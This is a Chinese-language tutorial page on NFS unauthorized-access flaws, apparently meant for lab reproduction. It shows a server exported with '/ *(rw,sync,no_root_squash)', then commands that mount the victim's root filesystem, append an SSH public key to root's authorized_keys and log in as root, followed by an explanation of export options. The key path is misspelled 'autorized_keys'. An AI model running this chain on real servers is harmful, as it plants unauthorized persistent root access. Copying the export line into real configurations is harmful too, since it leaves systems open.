Skip to content

未授权访问漏洞

NFS未授权访问漏洞

漏洞复现

# 安装nfs服务
yum install nfs-utils.x86_64 -y

# 启动服务
systemctl start rpcbind.service # 如果这个服务不启动,nfs服务会启动失败
systemctl start nfs-server.service

# 配置服务开机自启
systemctl enable rpcbind.service
systemctl enable nfs-server.service

# 关闭防火墙或设置防火墙允许nfs服务通过
firewall-cmd --permanent --add-service=nfs
firewall-cmd --permanent --add-service=rpc-bind
firewall-cmd --permanent --add-service=mountd
firewall-cmd --reload

# 配置nfs
echo '/ *(rw,sync,no_root_squash)' >> /etc/exports

# 启动共享
exportfs -r

# 查看共享
showmount -e

# 客户端挂载,挂载到本地的/tmp/test路径
mount -t nfs server_ip:/ /tmp/test

对NFS未授权访问漏洞进行利用

# 扫描服务器IP
rpcinfo -p server_ip

# 查看nfs挂载
showmount -e server_ip

# 配置ssh永久连接
mount -t nfs server_ip:/ /tmp/test
ssh-keygen
cat ~/.ssh/id_rsa.pub >> /tmp/test/root/.ssh/autorized_keys
ssh root@server_ip

漏洞分析

/etc/exports文件格式

<输出目录> [客户端1 选项(访问权限,用户映射,其他)] [客户端2 选项(访问权限,用户映射,其他)]

输出目录

需要共享给客户端使用的目录。

客户端

网段或单个IP均可:10.10.10.0/24

选型

  • 设置输出目录只读:ro
  • 设置输出目录读写:rw

用户映射

  • all_squash:将远程访问的所有普通用户及所属组都映射为匿名用户或用户组(nfsnobody);
  • no_all_squash:与all_squash取反(默认设置);
  • root_squash:将root用户及所属组都映射为匿名用户或用户组(默认设置);
  • no_root_squash:与root_squash取反;
  • anonuid=xxx:将远程访问的所有用户都映射为匿名用户,并指定该用户为本地用户(UID=xxx);
  • anongid=xxx:将远程访问的所有用户组都映射为匿名用户组账户,并指定该匿名用户组账户为本地用户组账户(GID=xxx);

其它选项

  • secure:限制客户端只能从小于1024的tcp/ip端口连接nfs服务器(默认设置);
  • insecure:允许客户端从大于1024的tcp/ip端口连接服务器;
  • sync:将数据同步写入内存缓冲区与磁盘中,效率低,但可以保证数据的一致性;
  • async:将数据先保存在内存缓冲区中,必要时才写入磁盘;
  • wdelay:检查是否有相关的写操作,如果有则将这些写操作一起执行,这样可以提高效率(默认设置);
  • no_wdelay:若有写操作则立即执行,应与sync配合使用;
  • subtree:若输出目录是一个子目录,则nfs服务器将检查其父目录的权限(默认设置);
  • no_subtree:即使输出目录是一个子目录,nfs服务器也不检查其父目录的权限,这样可以提高效率;

参考资料

未授权访问漏洞总结